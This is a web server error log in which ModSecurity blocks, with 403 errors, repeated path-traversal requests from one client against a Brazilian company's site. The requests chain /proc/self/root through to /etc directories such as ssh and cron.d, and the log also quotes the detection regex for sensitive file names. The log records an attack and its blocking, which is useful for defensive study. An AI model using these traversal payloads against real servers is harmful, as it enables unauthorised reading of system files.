[Tue Mar 17 15:02:30.097850 2026] [:error] [pid 6296:tid 140411741927168] [client 74.7.241.31:36216] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmXNXIk7brgkOH-rIWRKQAAAUA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 15:02:32.227368 2026] [:error] [pid 19507:tid 140411683178240] [client 74.7.241.31:36218] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmXONY0UrI5A3LftIwCGQAAAYc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 15:02:34.279212 2026] [mime_magic:error] [pid 29151:tid 140411708356352] (70014)End of file found: [client 74.7.243.128:42494] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/var/spool/postfix
[Tue Mar 17 15:02:35.300736 2026] [:error] [pid 9299:tid 140411741927168] [client 74.7.241.31:36230] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmXO7-sgTmmJoPuMdy70AAAAsA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 15:02:37.441064 2026] [:error] [pid 7437:tid 140411708356352] [client 74.7.241.31:55960] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmXPQeiSKl8TjouI-YfAAAAA8Q"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 15:02:40.395461 2026] [:error] [pid 19507:tid 140411716749056] [client 74.7.241.31:55974] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmXQNY0UrI5A3LftIwCHAAAAYM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 15:02:43.129806 2026] [proxy_fcgi:error] [pid 9299:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:52572] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:02:44.427143 2026] [:error] [pid 7437:tid 140411641214720] [client 74.7.241.31:55980] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmXRAeiSKl8TjouI-YfBAAAA8w"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 15:02:45.987124 2026] [:error] [pid 19507:tid 140411674785536] [client 74.7.241.31:55982] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmXRdY0UrI5A3LftIwCHgAAAYg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 15:02:48.427569 2026] [:error] [pid 2598:tid 140411590858496] [client 74.7.241.31:52440] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmXSBj0p0SRWAqcjGF_AgAAAxI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 15:02:49.565009 2026] [:error] [pid 2598:tid 140411616036608] [client 74.7.241.31:52440] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmXSRj0p0SRWAqcjGF_AwAAAw8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 15:02:51.414997 2026] [:error] [pid 2473:tid 140411616036608] [client 74.7.241.31:52456] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmXS6BJNF7axNlVR0UdyQAAAA8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 15:02:54.048128 2026] [:error] [pid 19507:tid 140411557287680] [client 74.7.241.31:52462] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmXTtY0UrI5A3LftIwCIAAAAZY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 15:02:57.061204 2026] [:error] [pid 17965:tid 140411674785536] [client 74.7.241.31:52474] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmXUat8Nd0UC_OcbVHQTQAAAIg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 15:02:57.601793 2026] [mime_magic:error] [pid 2473:tid 140411641214720] (70014)End of file found: [client 216.73.216.191:57042] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Tue Mar 17 15:02:57.602172 2026] [access_compat:error] [pid 2473:tid 140411641214720] [client 216.73.216.191:57042] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php5
[Tue Mar 17 15:03:00.014695 2026] [:error] [pid 6296:tid 140411658000128] [client 74.7.241.31:41292] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmXVHIk7brgkOH-rIWRNwAAAUo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 15:03:00.244148 2026] [:error] [pid 6296:tid 140411540502272] [client 74.7.241.31:41292] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmXVHIk7brgkOH-rIWROAAAAVg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 15:03:05.211617 2026] [:error] [pid 9299:tid 140411666392832] [client 74.7.241.31:41302] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmXV7-sgTmmJoPuMdy74gAAAsk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 15:03:06.152053 2026] [proxy_fcgi:error] [pid 6296:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:53382] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:03:08.476694 2026] [:error] [pid 2598:tid 140411674785536] [client 74.7.241.31:53946] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmXWxj0p0SRWAqcjGF_DAAAAwg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 15:03:09.466262 2026] [:error] [pid 2598:tid 140411590858496] [client 74.7.241.31:53946] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmXXRj0p0SRWAqcjGF_DwAAAxI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 15:03:12.099178 2026] [:error] [pid 7004:tid 140411557287680] [client 74.7.241.31:53950] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmXYMU6Sx0TG1YjmQi0awAAApY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 15:03:14.022342 2026] [:error] [pid 7004:tid 140411683178240] [client 74.7.241.31:53950] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmXYsU6Sx0TG1YjmQi0bQAAAoc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 15:03:16.499767 2026] [:error] [pid 2473:tid 140411557287680] [client 74.7.241.31:53952] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmXZKBJNF7axNlVR0Ud1gAAABY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 15:03:18.707536 2026] [:error] [pid 7004:tid 140411574073088] [client 74.7.241.31:37158] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmXZsU6Sx0TG1YjmQi0cwAAApQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
